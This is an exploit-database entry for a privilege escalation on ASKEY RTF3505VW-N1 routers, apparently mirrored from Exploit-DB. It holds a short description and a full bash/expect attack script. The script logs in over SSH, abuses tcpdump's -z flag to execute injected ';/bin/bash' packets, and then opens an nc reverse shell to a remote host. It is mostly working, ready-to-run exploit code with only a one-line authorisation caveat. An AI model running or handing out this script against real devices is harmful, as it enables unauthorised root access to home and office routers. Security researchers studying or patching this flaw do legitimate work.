ASKEY RTF3505VW-N1 – Privilege Escalation

  • 作者: Leonardo Nicolas Servalli
    日期: 2023-03-31
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51155/
  • # Exploit Title: ASKEY RTF3505VW-N1 - Privilege escalation
    # Date: 07-12-2022
    # Exploit Author: Leonardo Nicolas Servalli
    # Vendor Homepage: www.askey.com
    # Platform: ASKEY router devices RTF3505VW-N1
    # Tested on: Firmware BR_SV_g000_R3505VMN1001_s32_7
    # Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-ASKEY/blob/main/README.md
    
    #Description:
    #----------
    
    # Mitrastar ASKEY RTF3505VW-N1 devices expose SSH access into a restricted default shell (the credentials are printed on the back of the router, and in some cases these routers are still running default credentials).
    
    # The "tcpdump" binary is reachable from the restricted shell and its -z flag (a command run on every rotated capture file) is not filtered. With "-w /tmp/runme<N> -W 1 -G 1 -z sh" the capture file is rotated after one second and then executed by "sh". If, meanwhile, packets whose payload contains the string ";/bin/bash" are sent to TCP port 80 (the router's Web GUI), that string ends up in the capture file and is executed by "sh", spawning a busybox/ash shell outside the restricted shell (the exploit below waits for a "#" prompt before launching its reverse shell).
    
    #Exploit:
    #--------
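    #!/usr/bin/bash
    # NOTE: in the published file this shebang is not on line 1, so it has no
    # effect when the file is executed directly; run it as `bash <script>`.
    #
    # Usage: <script> routerIP routerUser routerPassword remoteIPshell remotePortShell
    #
    # Flow of one attempt:
    #   1. a background loop connects to the router's TCP port 80 from source
    #      port 8888 and sends the string ";/bin/bash" (200 connections)
    #   2. over SSH (restricted shell) tcpdump is started writing to
    #      /tmp/runme$K, filtered on src port 8888, with "-z sh" so the rotated
    #      capture file is executed by sh
    #   3. once a busybox banner shows up, a nc reverse shell to
    #      remoteIPshell:remotePortShell is launched and the session is kept open
    #
    # Changes vs. the original listing: the argument check is a real arity check
    # (the original `[ -z "$@" ]` expands to several words once arguments are
    # given), the "yes/no" branch now continues to the password prompt, Tcl
    # trailing "#" comments (which are NOT comments in Tcl but extra words /
    # "extra characters after close-quote" errors) were moved to their own
    # lines, the password is passed to expect through the environment so Tcl
    # does not interpret characters such as $ [ \ " in it, and the background
    # injector is killed after every attempt instead of being leaked.
    #
    # Only use against devices you are authorised to test.

    set -u

    # Positional parameters are referenced by number below, so exactly five are required.
    if [ "$#" -ne 5 ]; then
    	echo "Command example: $0 routerIP routerUser routerPassword remoteIPshell remotePortShell " >&2
    	exit 1
    fi

    router_ip=$1
    router_user=$2
    shell_ip=$4
    shell_port=$5
    # Exported so the expect script can read it as $env(ROUTER_PASS) without
    # the value being substituted into Tcl source.
    export ROUTER_PASS="$3"

    injector_pid=""

    # Stop the background injector on every exit path (normal end, Ctrl-C,
    # or the infinite wait of a successful attempt being interrupted).
    cleanup() {
    	if [ -n "$injector_pid" ]; then
    		kill "$injector_pid" 2>/dev/null
    	fi
    }
    trap cleanup EXIT

    for K in $(seq 1 15); do	# attempts
    	echo "**************************************************************************************"
    	echo "******************************** Attempt number $K ************************************"
    	echo "**************************************************************************************"

    	# Background loop injecting ";/bin/bash" into port 80 of the router from
    	# source port 8888 (the port the tcpdump filter below selects).
    	for l in $(seq 1 200); do echo ";/bin/bash" | nc -p 8888 "$router_ip" 80; done > /dev/null 2>&1 &
    	injector_pid=$!

    	# Expect script: log in over SSH, start tcpdump with "-z sh", and when a
    	# busybox shell appears launch a more stable reverse shell to our listener.
    	# The heredoc is unquoted, so $K and the bash variables are expanded by
    	# bash; "\$env(...)" is left for Tcl.
    	/usr/bin/expect << EOD
    		spawn ssh $router_user@$router_ip
    		expect {
    			"yes/no" {
    				send "yes\r"
    				# first connection to this host key: keep waiting for the password prompt
    				exp_continue
    			}
    			"password: " {
    				send -- "\$env(ROUTER_PASS)\r"
    				expect ">"
    				# capture only the injector traffic (src port 8888), rotate after
    				# one second into a single file and hand that file to "sh" via -z
    				send -- "tcpdump -v -ln -i any -w /tmp/runme$K -W 1 -G 1 -z sh src port 8888\r"
    			}
    		}
    		set timeout 2
    		expect {
    			timeout {
    				puts "Timeout..."
    				send "exit\r"
    				exit 0
    			}
    			"*usy*ox" {
    				expect "#"
    				send "rm /tmp/runme* \r"
    				send "rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f | /bin/sh -i 2>&1|nc $shell_ip $shell_port >/tmp/f \r"
    				puts "Rooted !!!!!!!!!"
    				# wait forever so the SSH session, and the reverse shell it spawned, stay open
    				set timeout -1
    				expect "NEVER_APPEARING_STRING#"
    			}
    		}
    EOD

    	# This attempt is over (expect returned): stop its injector before the next one.
    	kill "$injector_pid" 2>/dev/null
    	wait "$injector_pid" 2>/dev/null
    	injector_pid=""
    done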